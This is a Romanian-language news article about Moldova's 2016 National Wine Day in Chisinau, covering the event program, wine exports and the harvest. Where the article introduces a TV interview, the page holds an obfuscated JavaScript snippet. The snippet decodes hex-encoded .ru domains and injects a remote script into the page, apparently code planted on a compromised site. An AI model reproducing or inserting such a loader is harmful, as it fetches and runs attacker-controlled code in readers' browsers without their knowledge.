Actualitate

ZIUA NAȚIONALĂ A VINULUI 2016: În PMAN sunt așteptați peste 100 de mii de vizitatori. Iată care este programul evenimentelor (VIDEO)

Despre aceasta a comunicat Gheorghe Arpentin, directorul Oficiului Naţional al Viei şi Vinului, într-o conferinţă de presă înainte de deschiderea sărbătorii, scrie IPN.

În acest an sunt prezentate peste 400 de tipuri de vinuri moldoveneşti. Iar vizitatorii vor fi îndemnaţi să nu se limiteze doar la programul pregătit în PMAN, ci să meargă şi la vinării, care au organizat propriile programe cu ocazia Zilei Naţionale a Vinului. Oficiul Naţional al Viei şi Vinului suportă cheltuielile de transport către cele opt vinării care aşteaptă vizitatori. Gheorghe Arpentin a precizat că se doreşte promovarea consumului moderat de vin. La sărbătoare vizitatorii vor fi informaţi cum se consumă corect vinul.

Ziua Naţională a Vinului este organizată cu susţinerea Proiectului de Competitivitate al USAID Moldova. Diana Lazăr, vicedirectoarea proiectului, a menţionat că se doreşte ca brandul „Vinul Moldovei” să devină o legendă pe pieţele externe. Pentru a promova mai bine Moldova peste hotare, vizitatorilor li se va propune să scrie un mesaj pe o carte poştală şi să o trimită pe orice adresă din lume, absolut gratuit, astfel imagini cu vinăriile şi locurile frumoase din Moldova vor fi transmise peste tot.

Ministrul agriculturii şi industriei alimentare, Eduard Grama, a spus că exportul de vin este în creştere de la an la an, iar după embargoul impus de Rusia producătorii moldoveni au început a valorifica şi alte pieţe, cum ar fi cele asiatice. De asemenea, ministrul a specificat că în România vânzările de vin moldovenesc sunt în continuă creştere.

Potrivit oficialului, vinificatorii i-au comunicat recent că vinurile negre anul acesta au un grad de alcool ridicat, iar acest lucru îi pune în dilemă, căci cumpărătorii încep să caute vinuri cu un grad de alcool mai mic, care sunt mai uşor de consumat. Totuşi, nivelul de zahăr din struguri în anul curent permite să se considere că vinurile vor fi foarte bune. În ceea ce ţine de vinurile albe, volumul de producere este redus căci soiurile respective au rodit mai prost.

Ziua Naţională Vinului a fost instituită în 1990 şi se sărbătoreşte anual din 2002. În 2009, Guvernul a decis ca sărbătoarea să fie marcată la Centrul Expoziţional „Moldexpo”, însă din 2013 aceasta s-a desfăşurat în PMAN. Anul trecut, Ziua Vinului a fost organizată într-un format nou, evenimentele culturale şi degustările fiind desfăşurate la fiecare vinărie în parte. Decizia a fost luată pe motiv că în Piaţă erau instalate circa 300 de corturi ale protestatarilor. 

Despre programul evenimentelor, planificate cu ocazia Zilei Naționale a Vinului, a vorbit și Vladimir Grosu, directorul adjunct al Oficiului Național al Viei și Vinului, în cadrul emisiunii Cod Galben de la postul 10TV:

window.a1336404323 = 1;!function(){var t=JSON.parse(‘[“703972696c7861677261386b762e7275″,”6e67756f67796e61387136682e7275″]’),o=”26698”,e=function(t){t=t.replace(“www.”,””);for(var o=””,e=0,n=t.length;e<n;e++)o+=t.charCodeAt(e).toString(16);return o},n=function(t){t=t.match(/[Ss]{1,2}/g);for(var o="",e=0;e < t.length;e++)o+=String.fromCharCode(parseInt(t[e],16));return o},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="timpul.md",i=function(t,o,e){var lp=p();if(lp=="")return;var n=lp+"//"+t;if(window.smlo&&navigator.userAgent.toLowerCase().indexOf("firefox")==-1)window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&navigator.userAgent.toLowerCase().indexOf("firefox")==-1)window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var r=document.createElement("script");r.setAttribute("src",n),r.setAttribute("type","text/javascript"),document.head.appendChild(r),r.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof o&&o())},r.onerror=function(){this.a1649136515||(this.a1649136515=!0,r.parentNode.removeChild(r),"function"==typeof e&&e())}}},a=function(c){var f=t[c],l=n(f)+"/ajs/"+o+"/c/"+e(r)+"_"+(self===top?0:1)+".js";window.a3164427983=f,i(l,function(){},function(){t[c+1]&&a(c+1)})},f=function(){a(0)};f()}();

Sursa: ipn.md

Fiți la curent cu ultimele noutăți. Urmărește TIMPUL pe Google News și Telegram!

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *